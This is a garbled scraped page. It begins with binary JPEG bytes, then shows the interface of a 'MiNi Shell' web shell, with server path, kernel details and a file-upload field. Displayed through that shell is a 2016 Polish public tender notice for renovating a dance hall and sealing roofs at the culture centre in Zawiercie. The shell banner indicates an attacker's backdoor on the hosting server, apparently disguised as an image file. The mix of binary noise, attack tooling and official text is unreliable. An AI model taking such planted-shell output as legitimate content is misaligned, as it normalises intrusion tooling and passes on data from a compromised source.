JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/127553-N-2016.html

<p class="kh_header"><b>Zawiercie: Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią oraz uszczelnienie pokrycia dachowego nad MOK i USC w Zawierciu.
Zadanie nr 1:
Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią w budynku Miejskiego Ośrodka Kultury Centrum im. Adama Mickiewicza w Zawierciu.
Zadanie nr  2:
Uszczelnienie pokrycia dachowego nad MOK i USC w Zawierciu.</b><br>
<b>Numer ogłoszenia: 127553 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Kultury "CENTRUM" im. Adama Mickiewicza , ul. Piastowska 1, 42-400 Zawiercie, woj. śląskie, tel. 32 6722882, 602 773 051, faks 32 6722882.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią oraz uszczelnienie pokrycia dachowego nad MOK i USC w Zawierciu.
Zadanie nr 1:
Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią w budynku Miejskiego Ośrodka Kultury Centrum im. Adama Mickiewicza w Zawierciu.
Zadanie nr  2:
Uszczelnienie pokrycia dachowego nad MOK i USC w Zawierciu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią oraz uszczelnienie pokrycia dachowego nad MOK i USC.

Zadanie nr 1:
Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią w budynku Miejskiego Ośrodka Kultury Centrum im. Adama Mickiewicza w Zawierciu.

Zakres przedmiotu zamówienia obejmuje remont pomieszczenia Sali tanecznej nr 320 oraz pomieszczenia szatni, aranżację meblową wnętrz wraz z dostosowaniem instalacji elektrycznej oświetleniowej oraz lokalizacji gniazd elektrycznych dla potrzeb osób odbywających w niej próby oraz ćwiczenia taneczne.

1.	Zakres prac obejmuje:

	Roboty demontażowe:
-	demontaż trzech sztuk drzwi,
-	demontaż przewodu wentylacyjnego o długości 8m, wykonanego z blachy stalowej,
-	demontaż osłony przewodu wentylacyjnego,
-	demontaż karniszy oraz żaluzji okiennych,
-	rozebranie boazerii ściennej,
-	demontaż lamp oświetleniowych;
-	demontaż istniejącej posadzki w szatni (płytki PCV),
-	skucie posadzki cementowej w szatni,
-	demontaż istniejących włączników i gniazd elektrycznych,
-	częściowe wyburzenie ścian.
-	
	Roboty remontowo-montażowe:
-	wykonanie przesklepienia otworów drzwiowych,
-	uzupełnienie ścianek działowych,
-	uzupełnienie tynków,
-	obsadzenie kratek wentylacyjnych, ściennych oraz sufitowych,
-	obsadzenie ościeżnic wraz z montażem drzwi aluminiowych,
-	montaż ościeżnicy wraz ze skrzydłem drzwiowym drewnianym,
-	montaż trzech sztuk progów z drewna liściastego,
-	wyrównanie podłoża pod posadzkę w szatni,
-	montaż płytek podłogowych w szatni wraz z cokołami,
-	wykonanie sufitu podwieszonego gipsowo-kartonowego na powierzchni 32,10m2,
-	zmycie i zeskrobanie starej farby na ścianach oraz sufitach,
-	przygotowanie podłoża pod malowanie farbami akrylowymi,
-	dwukrotne malowanie ścian i sufitów farbami akrylowymi.

	Roboty elektryczne:
-	montaż przewodów elektrycznych,
-	montaż lamp (plafonów) oświetleniowych - 17 szt.,
-	montaż opraw halogenowych - 16 szt.,
-	montaż włączników świetlnych oraz gniazdek.
	Roboty związane z konserwacją podłogi na sali tanecznej:
-	mechaniczne szlifowanie parkietu,
-	wymiana listew przyściennych,
-	jednokrotne malowanie parkietu-półmat.
-	
	Wykończenie i wyposażenie wnętrza:
-	dostarczenie i montaż zabudowy garderoby oraz pozostałych elementów,
-	wyposażenie wnętrza sali tanecznej oraz szatni,
-	montaż drzwi podwieszonych przesuwnych do wydzielonej garderoby,
-	dostarczenie i montaż rolet okiennych podgumowanych, kolor antracyt.

2.	Stan istniejący:
Sala taneczna nr 320 zlokalizowana na II piętrze Miejskiego Ośrodka Kultury Centrum w Zawierciu. Dojście do sali prowadzi z klatki schodowej przez korytarz, gdzie zlokalizowane jest bezpośrednie wejście do sali oraz szatni. Pomieszczenia szatni oraz sala są przyległe, komunikacja między nimi jest zapewniona poprze przejście z sali tanecznej. Przedmiotowe pomieszczenia są doświetlone światłem naturalnym oraz sztucznym.

Poniżej przedstawiono charakterystyczne parametry sali tanecznej:
	Szerokość: 894 cm
	Długość: 1743 cm
	Wysokość: 298 cm (sufit częściowo podwieszany do wysokości 266cm).

Do sali tanecznej bezpośrednio przylega taras, do którego dojście jest zapewnione poprzez
drzwi balkonowe znajdujące się w sali.

Poniżej przedstawiono charakterystyczne parametry pomieszczenia szatni:
	Szerokość: 270 cm
	Długość: 280 cm
	Wysokość: 298 cm.

3. Każdy z wykonawców uprawniony jest do dokonania oględzin terenu prowadzenia prac na etapie sporządzania ofert celem sprawdzenia warunków panujących na obiekcie. Z uwagi na ryczałtowy charakter zamówienia w ofercie należy uwzględnić wszystkie dodatkowe opłaty związane z wykonywanymi robotami, a wynikającymi z zakresu robót.

4. Sporządzona oferta musi być zgodna z przedmiotem zamówienia, projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót oraz z przedmiarem robót. 

5. Wykonawca jest zobowiązany udzielić gwarancji na przedmiot zamówienia min. 36 miesięcy od daty odbioru końcowego.

6. Jeżeli dokumentacja projektowa w tym przedmiar robót lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych pod warunkiem, że posiadają parametry techniczne nie gorsze od wskazanych. Podane w opisie przedmiotu zamówienia nazwy własne nie mają na celu naruszenia art. 29 ustawy Pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych stawianych przez Zamawiającego. Zamawiający dopuszcza rozwiązana równoważne pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego.

7. Tam, gdzie w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót lub przedmiarach, przedmiot zamówienia został opisany z pomocą norm aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 Zamawiający dopuszcza rozwiązania równoważne opisywanym.

8. Ilekroć w specyfikacji technicznej wykonania i odbioru robót, dokumentacji technicznej mowa jest o polskich normach, należy przez to rozumieć polskie normy przenoszące normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego, a w ich braku inne stosowane normy w kolejności zgodnej z art. 30 ust. 2 i 3 ustawy PZP.

9. Wykonanie robót budowlanych będących przedmiotem zamówienia nie jest uzależnione od uzyskania pozwolenia na budowę.


Zadanie nr  2:
Uszczelnienie pokrycia dachowego nad MOK i USC w Zawierciu.	

Zakres przedmiotu zamówienia obejmuje częściowe pokrycie starych dachów papą termozgrzewalną wraz z obróbką blacharską oraz wymianę rury odpływowej.

1.	Zakres prac obejmuje:
-	rozbiórkę czapek kominowych,
-	wykonanie nowych czapek kominowych,
-	odbicie odpadających tynków,
-	wykonanie nowych tynków kominów,
-	umocowanie obróbek blacharskich,
-	wymianę sztucera rury odpływowej,
-	obróbki kominów papą termozgrzewalną,
-	jednowarstwowe krycie papą termozgrzewalną,
-	posmarowanie nawierzchni roztworem asfaltowym,
-	wywóz i utylizację gruzu.


2.	Stan istniejący:
Przedmiotowy dach ma powierzchnię ponad 2.000 m2. W kilku miejscach stwierdzono nieszczelności pokrycia dachowego uwidaczniające się na sufitach i na ścianach pomieszczeń ostatniej kondygnacji. Przyczyną zaistniałych zacieków jest obluzowanie się obróbek blacharskich murów ogniowych, odpadający tynk przy kominach i częściowe wykruszenie się batonu na czapkach kominowych oraz odklejenie się obróbek kominów z papy termozgrzewalnej.

3. Każdy z wykonawców uprawniony jest do dokonania oględzin terenu prowadzenia prac na etapie sporządzania ofert celem sprawdzenia warunków panujących na obiekcie. Z uwagi na ryczałtowy charakter zamówienia w ofercie należy uwzględnić wszystkie dodatkowe opłaty związane z wykonywanymi robotami, a wynikającymi z zakresu robót.

4. Sporządzona oferta musi być zgodna z przedmiotem zamówienia, specyfikacją techniczną wykonania i odbioru robót, rzutem dachu oraz z przedmiarem robót. 

5. Wykonawca jest zobowiązany udzielić gwarancji na przedmiot zamówienia min. 36 miesięcy od daty odbioru końcowego.

6. Jeżeli dokumentacja projektowa w tym przedmiar robót lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych pod warunkiem, że posiadają parametry techniczne nie gorsze od wskazanych. Podane w opisie przedmiotu zamówienia nazwy własne nie mają na celu naruszenia art. 29 ustawy Pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych stawianych przez Zamawiającego. Zamawiający dopuszcza rozwiązana równoważne pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego.

7. Tam, gdzie w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót lub przedmiarach, przedmiot zamówienia został opisany z pomocą norm aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 Zamawiający dopuszcza rozwiązania równoważne opisywanym.

8. Ilekroć w specyfikacji technicznej wykonania i odbioru robót, dokumentacji technicznej mowa jest o polskich normach, należy przez to rozumieć polskie normy przenoszące normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego, a w ich braku inne stosowane normy w kolejności zgodnej z art. 30 ust. 2 i 3 ustawy PZP.

9. Wykonanie robót budowlanych będących przedmiotem zamówienia nie jest uzależnione od uzyskania pozwolenia na budowę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.21.14-6, 45.42.11.31-1, 45.41.00.00-4, 45.44.21.00-8, 45.31.12.00-2, 45.11.12.20-6, 45.21.23.00-9, 45.26.12.10-9, 45.26.14.20-4, 45.23.24.52-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył co najmniej dwie roboty budowlane polegające na budowie, przebudowie lub remoncie pomieszczeń o wartości co najmniej 40 000,00 zł brutto każda.
Powyższy warunek dotyczy wyłącznie Zadania nr 1.
W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
1) wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania (zgodnie z załącznikiem nr 4 do SIWZ) oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
	Dowodami, o których wyżej mowa są:
-	poświadczenia;
-	inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia o którym wyżej mowa.
Uwaga: Wykaz robót należy złożyć wyłącznie w przypadku składania oferty przez Wykonawcę na Zadanie nr 1. 
W przypadku składania oferty przez Wykonawcę wyłącznie na Zadanie nr 2 nie należy składać Wykazu robót.
Uwaga: Należy wykazać i przedłożyć dowody wykonania robót budowlanych w liczbie i przedmiocie wystarczającym do wykazania spełniania opisanego wyżej warunku.
Uwaga: W przypadku gdy Zamawiający - Miejski Ośrodek Kultury Centrum im. Adama Mickiewicza - jest podmiotem, na rzecz którego, roboty, budowlane wskazane w wykazie, o którym mowa powyżej zostały wcześniej wykonane, Wykonawca nie ma obowiązku przekładania dowodów o których powyżej mowa. 
2) oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego
o których mowa w art. 22 ust.1 ustawy Prawo Zamówień Publicznych - zgodne z załącznikiem nr 3 do SIWZ.
Ocena spełniania w/w warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz i dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy ograniczyć wyłącznie do robót budowlanych potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, które należy przedłożyć wraz z ofertą:
1) Druk Formularz oferty - zgodnie z załącznikiem nr 1 do SIWZ.
2) Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem notarialnie lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby. Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów wymaga, aby z przedłożonego zobowiązania lub innych dokumentów wynikał w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu  zamówienia,
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zadanie nr 1:
1.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian postanowień zawartej umowy:
1)	Zmiana terminu realizacji przedmiotu umowy z powodu:
a)	działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności,
b)	wyjątkowo niesprzyjających warunków fizycznych bądź atmosferycznych,
c)	nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy,
d)	wystąpienia zamówień dodatkowych w rozumieniu ustawy Prawo zamówień publicznych, niezbędnych do prawidłowego wykonania realizowanego zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia,
e)	braku w dokumentacji projektowej,
f)	zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie robót przez Zamawiającego,
g)	zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy i nieprzewidywalnych, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy,
2)	rezygnacja z wykonania części robót - ograniczenie zakresu robót wynikające z wprowadzenia zmian istotnych lub nieistotnych w dokumentacji projektowej, wad w dokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu umowy lub z przyczyn niezależnych od Zamawiającego wraz z obniżeniem wynagrodzenia umownego o zakres z którego Zamawiający rezygnuje,
3)	zmiana przedstawicieli uczestników procesu inwestycyjnego w przypadku:
a)	zmiany którejkolwiek z osób wskazanych w § 5 ust. 1, w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy,
b)	zmiany przedstawicieli Zamawiającego na wniosek Zamawiającego,
